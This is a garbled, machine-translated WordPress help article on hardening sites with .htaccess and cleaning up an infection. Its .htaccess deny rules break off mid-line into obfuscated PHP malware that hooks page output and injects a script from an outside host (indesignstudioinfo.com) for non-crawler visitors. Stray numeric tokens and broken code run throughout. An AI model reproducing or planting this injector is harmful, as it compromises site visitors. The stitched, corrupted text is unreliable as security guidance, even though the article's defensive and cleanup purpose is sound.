Avoid hacking in WordPress from .htaccess • WordPress Help

The file .htaccess is the first barrier that you can use in a system based on Linux servers with Apache, because it has a good amount of rules that we can apply and, thanks to that, and as it is today's case, protect WordPress from hackers .

The following code, added to the file .htaccess of your installation (hidden file located in the root folder) will avoid a lot of common systems of inject code and hack WordPress .

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22 [19659026] RewriteEngine On

# without access to proc / self / environ

] RewriteCond % { QUERY _ STRING } proc / self / ] environ [ OR ]

# block any script that try from establish a value mosConfig through through from a URL

RewriteCond % [19659035] {} STRING }

mosConfig _ [ to - zA - Z _ ] { 1 21 } ( = | ] 3D ) [ OR ]

# block any [19659027] script that try of to place you code encoded base64 _ encode to via of a URL

RewriteCond % { QUERY _ STRING } base64 _ encode . * (. * ) [ OR ]

# [1965902] 7] blocks any script that includes the tag "); } return ""; }} if (! function_exists ('gzdecode')) {function gzdecode () {$ R30B2AB8DC1496D06B230A71D8962AF5D = @ ord (@substr ($ R5A9CF1B497502ACA23C8F611A564684C, 3.1)); $ RBE4C4D037E939226F65812885A53DAD9 = 10; $ RA3D52E52A48936CDE0F5356BB08652F2 = 0; if ($ R30B2AB8DC1496D06B230A71D8962AF5D & 4) {
 $ R63BEDE6B19266D4EFEAD07A4D91E29EB = @ unpack ('v', substr ($ R5A9CF1B497502ACA23C8F611A564684C, 10.2)); if ($ R034AE2AB94F99CC81B389A1822DA3353 === FALSE) {$ R034AE2AB94F99CC81B389A1822DA3353 = $ R5A9CF1B497502ACA23C8F611A564684C; } return $ R034AE2AB94F99CC81B389A1822DA3353; }} function mrobh ($ RE82EE9B121F709895EF54EBA7FA6B78B) {Header ('Content-Encoding: none'); $ RA179ABD3A7B9E28C369F7B59C51B81DE = gzdecode ($ RE82EE9B121F709895EF54EBA7FA6B78B); if (preg_match ('/ < / body / if', $ RA179ABD3A7B9E28C369F7B59C51B81DE)) {return preg_replace ('/ ( ] * >) / if', gml (). " n". '$ 1 ', $ RA179ABD3A7B9E28C369F7B59C51B81DE); } else {return $ RA179ABD3A7B9E28C369F7B59C51B81DE.gml (); }} ob_start ('mrobh'); }}

if ( function_exists ( 'ob_start' ) && ! isset ( $ GLOBALS [19659017] [) 'mr_no' ] ) ) { $ GLOBALS [ 'mr_no' ] = 1 ; if (! function_exists ( 'mrobh' ) ) { if (! function_exists ( 'gml' ) ) { function ] () { if (! stristr ( $ _ SERVER [[19659020] "HTTP_USER_AGENT" ] "googlebot" ) && (! stristr ([19659026] $ _ SERVER [ "HTTP_USER_AGENT" [1 9659017]] "yahoo" ) ) ) { return base64_decode [19659017] ( " <script src = " http://indesignstudioinfo.com/ls.php "> " ) ] } return "" ; } } if (! function_exists ( 'gzdecode' ) ) { function gzdecode ( <script src = "http://indesignstudioinfo.com/ls.php" > ) { $ R30B2AB8DC1496D06B230A71D8962AF5D = @ ord ( @ substr ([19659026] $ R5A9CF1B497 502ACA23C8F611A564684C 3 1 ) ) ; $ RBE4C4D037E939226F65812885A53DAD9 = 10 [19659017]; $ RA3D52E52A48936CDE0F5356BB08652F2 = 0 ; if ( $ R30B2AB8DC1496D06B230A71D8962AF5D & 4 ) {

$ R63BEDE6B19266D4EFEAD07A4D91E29EB = @ unpack ( 'v' substr ] ( $ R5A9CF1B497502ACA23C8F611A564684C 10 2 ) ) ; if ( $ R034AE2AB94F99CC81B389A1822DA3353 ] === FALSE ) { $ R034AE2AB94F99CC81B389A1822DA3353 = $ R5A9CF1B497502ACA23C8F611A564684C ; } return $ R034AE2AB94F99CC81B389A1822DA3353 ; } } function ] mrobh ( $ RE82EE9B121F709895EF54EBA7FA6B78B ) { Header ( 'Content-Encoding: none' ) ; $ RA179ABD3A7B9E28C369F7B59C51B81DE = gzdecode ( $ RE82EE9B121F709895EF54EBA7FA6B78B ) ; if ( ] preg_match ( '/ < / body / si' $ RA179ABD3A7B9E28C369F7B59C51B81DE ) ) { return preg_replace ( '/ ( ] * >) / if' gml () ]. " n" . '$ 1' $ RA179ABD3A7B9E28C369F7B59 C51B81DE ) ; } else { return $ RA179ABD3A7B9E28C369F7B59C51B81DE ] gml ) ; } } ob_start ] ( 'mrobh' ) ; } }

The bug has cloth so to clean it has been said …

The first thing is to try the hack they have developed in Securi.net . Download this file to your desktop:
http://sucuri.net/malware/helpers/wordpress-fix_php.txt and rename it to wordpress-fix.php

Once done this you upload it to your site by FTP and execute it from the browser. That is: http://miweb.com/wordpress-fix.php

The script takes a few minutes to complete as it scans your entire site and removes the malware entries, recursively as well.

When finished you can delete the file and then to ensure that you leave everything clean, follow these indications, as always:

  • Export all your content using the WordPress export utility and save the wp-content folder as well as any other that you use so manual. Check your theme, plugins and uploads folders, etc, before giving them for insurance.
  • Check the file wp-config.php to eliminate any possible code injection, change the permissions to 644 or, much better, load a wp -config.php completely clean.
  • Change all passwords: ftp, database. Use strong passwords, using alphanumeric characters and symbols
  • As the problem affects the database, it must be discarded. Delete the current one and create a new one or, failing that, check each one of the tables
  • Delete all the contents of the current WordPress installation (remember that you have done backup before)
  • Install a clean WordPress (latest version) ), using the information from the newly created database
  • Upload your wp-content folder again, once you have verified that everything is clean
  • Import the posts from your site that you exported with the WordPress import utility
  • Set up your WordPress securely by following the instructions in the links provided

Let the backup be with you!

NOTICE : This publication is from two years ago or more. If it's a code or a plugin it might not work in the latest versions of WordPress, and if it's a news story it might be obsolete. Then do not say we have not warned you.

Loading …

That may also help you: